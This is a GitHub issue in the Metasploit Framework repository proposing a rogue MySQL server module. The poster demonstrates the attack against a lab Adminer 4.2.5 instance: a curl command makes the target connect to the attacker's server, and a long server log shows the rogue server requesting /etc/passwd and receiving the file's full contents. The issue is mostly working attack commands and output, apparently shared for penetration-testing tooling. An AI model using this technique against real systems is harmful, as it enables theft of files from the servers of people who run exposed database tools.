search

rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
33.99k stars 13.94k forks source link

[Suggestion] Add rogue MySQL server for file theft #12222

Open bcoles opened 5 years ago

bcoles commented 5 years ago

Add Rogue MySQL Server module as modules/auxiliary/server/ or modules/auxiliary/server/capture.

Known to work with Adminer. Will likely also work with many exposed installers for PHP / MySQL based applications, presuming sufficiently permissive network egress filtering.

Tested with Adminer 4.2.5 on Turnkey Linux LAMP Stack.

root@kali-2018:~/Rogue-MySql-Server# ./rogue_mysql_server.py 
root@kali-2018:~/Rogue-MySql-Server# curl -isk 'https://172.16.191.176:12322/?server=172.16.191.165&username=abc' > /dev/null
root@kali-2018:~/Rogue-MySql-Server# cat mysql.log 
2019-08-21 12:25:15,885:INFO:Conn from: ('172.16.191.176', 41732)
2019-08-21 12:25:15,886:DEBUG:Pushed: 'A\x00\x00\x00\n3.0.0-Evil_Mysql_Server\x006\x00\x00\x00evilsalt\x00\xdf\xf7\x08\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00evil2222\x00'
2019-08-21 12:25:15,889:DEBUG:Data recved: '<\x00\x00'
2019-08-21 12:25:15,889:DEBUG:Data recved: '\x01\x8d\xa2\n\x00\x00\x00\x00\xc0\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00abc\x00\x00\x00mysql_native_password\x00'
2019-08-21 12:25:15,889:DEBUG:Pushed: '\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00'
2019-08-21 12:25:15,889:INFO:Last packet
2019-08-21 12:25:15,890:DEBUG:Data recved: '\x0f\x00\x00'
2019-08-21 12:25:15,890:DEBUG:Data recved: '\x00\x03SET NAMES utf8'
2019-08-21 12:25:15,890:INFO:Query
2019-08-21 12:25:15,890:DEBUG:Pushed: '\x0c\x00\x00\x01\xfb/etc/passwd'
2019-08-21 12:25:15,890:DEBUG:Data recved: '2\x06\x00'
2019-08-21 12:25:15,890:DEBUG:Data recved: '\x02root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/bin/false\nsystemd-timesync:x:101:103:systemd Time Synchronization,,,:/run/systemd:/bin/false\nsystemd-network:x:102:104:systemd Network Management,,,:/run/systemd/netif:/bin/false\nsystemd-resolve:x:103:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false\nsystemd-bus-proxy:x:104:106:systemd Bus Proxy,,,:/run/systemd:/bin/false\nmysql:x:105:107:MySQL Server,,,:/nonexistent:/bin/false\nuuidd:x:106:108::/run/uuidd:/bin/false\nshellinabox:x:107:109:Shell In A Box,,,:/var/lib/shellinabox:/bin/false\nntp:x:108:111::/home/ntp:/bin/false\nstunnel4:x:109:113::/var/run/stunnel4:/bin/false\npostfix:x:110:114::/var/spool/postfix:/bin/false\nsshd:x:111:65534::/run/sshd:/usr/sbin/nologin\n'
2019-08-21 12:25:15,890:INFO:-- result
2019-08-21 12:25:15,890:INFO:Result: '\x02root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/bin/false\nsystemd-timesync:x:101:103:systemd Time Synchronization,,,:/run/systemd:/bin/false\nsystemd-network:x:102:104:systemd Network Management,,,:/run/systemd/netif:/bin/false\nsystemd-resolve:x:103:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false\nsystemd-bus-proxy:x:104:106:systemd Bus Proxy,,,:/run/systemd:/bin/false\nmysql:x:105:107:MySQL Server,,,:/nonexistent:/bin/false\nuuidd:x:106:108::/run/uuidd:/bin/false\nshellinabox:x:107:109:Shell In A Box,,,:/var/lib/shellinabox:/bin/false\nntp:x:108:111::/home/ntp:/bin/false\nstunnel4:x:109:113::/var/run/stunnel4:/bin/false\npostfix:x:110:114::/var/spool/postfix:/bin/false\nsshd:x:111:65534::/run/sshd:/usr/sbin/nologin\n'
2019-08-21 12:25:15,890:DEBUG:Data recved: '\x00\x00\x00'
2019-08-21 12:25:15,890:DEBUG:Data recved: '\x03'
2019-08-21 12:25:15,890:INFO:-- result
2019-08-21 12:25:15,890:INFO:Result: '\x03'
2019-08-21 12:25:15,890:DEBUG:Pushed: '\x07\x00\x00\x04\x00\x00\x00\x02\x00\x00\x00'
2019-08-21 12:25:15,891:INFO:Last packet
2019-08-21 12:25:15,891:DEBUG:Data recved: '.\x00\x00'
2019-08-21 12:25:15,891:DEBUG:Data recved: '\x00\x03SET sql_quote_show_create = 1, autocommit = 1'
2019-08-21 12:25:15,891:INFO:Query
2019-08-21 12:25:15,891:DEBUG:Pushed: '\x0c\x00\x00\x01\xfb/etc/passwd'
2019-08-21 12:25:15,891:DEBUG:Data recved: '2\x06\x00'
2019-08-21 12:25:15,891:DEBUG:Data recved: '\x02root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/bin/false\nsystemd-timesync:x:101:103:systemd Time Synchronization,,,:/run/systemd:/bin/false\nsystemd-network:x:102:104:systemd Network Management,,,:/run/systemd/netif:/bin/false\nsystemd-resolve:x:103:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false\nsystemd-bus-proxy:x:104:106:systemd Bus Proxy,,,:/run/systemd:/bin/false\nmysql:x:105:107:MySQL Server,,,:/nonexistent:/bin/false\nuuidd:x:106:108::/run/uuidd:/bin/false\nshellinabox:x:107:109:Shell In A Box,,,:/var/lib/shellinabox:/bin/false\nntp:x:108:111::/home/ntp:/bin/false\nstunnel4:x:109:113::/var/run/stunnel4:/bin/false\npostfix:x:110:114::/var/spool/postfix:/bin/false\nsshd:x:111:65534::/run/sshd:/usr/sbin/nologin\n'
2019-08-21 12:25:15,891:INFO:-- result
2019-08-21 12:25:15,891:INFO:Result: '\x02root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/bin/false\nsystemd-timesync:x:101:103:systemd Time Synchronization,,,:/run/systemd:/bin/false\nsystemd-network:x:102:104:systemd Network Management,,,:/run/systemd/netif:/bin/false\nsystemd-resolve:x:103:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false\nsystemd-bus-proxy:x:104:106:systemd Bus Proxy,,,:/run/systemd:/bin/false\nmysql:x:105:107:MySQL Server,,,:/nonexistent:/bin/false\nuuidd:x:106:108::/run/uuidd:/bin/false\nshellinabox:x:107:109:Shell In A Box,,,:/var/lib/shellinabox:/bin/false\nntp:x:108:111::/home/ntp:/bin/false\nstunnel4:x:109:113::/var/run/stunnel4:/bin/false\npostfix:x:110:114::/var/spool/postfix:/bin/false\nsshd:x:111:65534::/run/sshd:/usr/sbin/nologin\n'
2019-08-21 12:25:15,891:DEBUG:Data recved: '\x00\x00\x00'
2019-08-21 12:25:15,891:DEBUG:Data recved: '\x03'
2019-08-21 12:25:15,891:INFO:-- result
2019-08-21 12:25:15,891:INFO:Result: '\x03'
2019-08-21 12:25:15,891:DEBUG:Pushed: '\x07\x00\x00\x04\x00\x00\x00\x02\x00\x00\x00'
2019-08-21 12:25:15,891:INFO:Last packet
2019-08-21 12:25:15,892:DEBUG:Data recved: '\x01\x00\x00'
2019-08-21 12:25:15,892:DEBUG:Data recved: '\x00\x01'
root@kali-2018:~/Rogue-MySql-Server#
wvu commented 5 years ago

License looks good to me. Can add as an external module.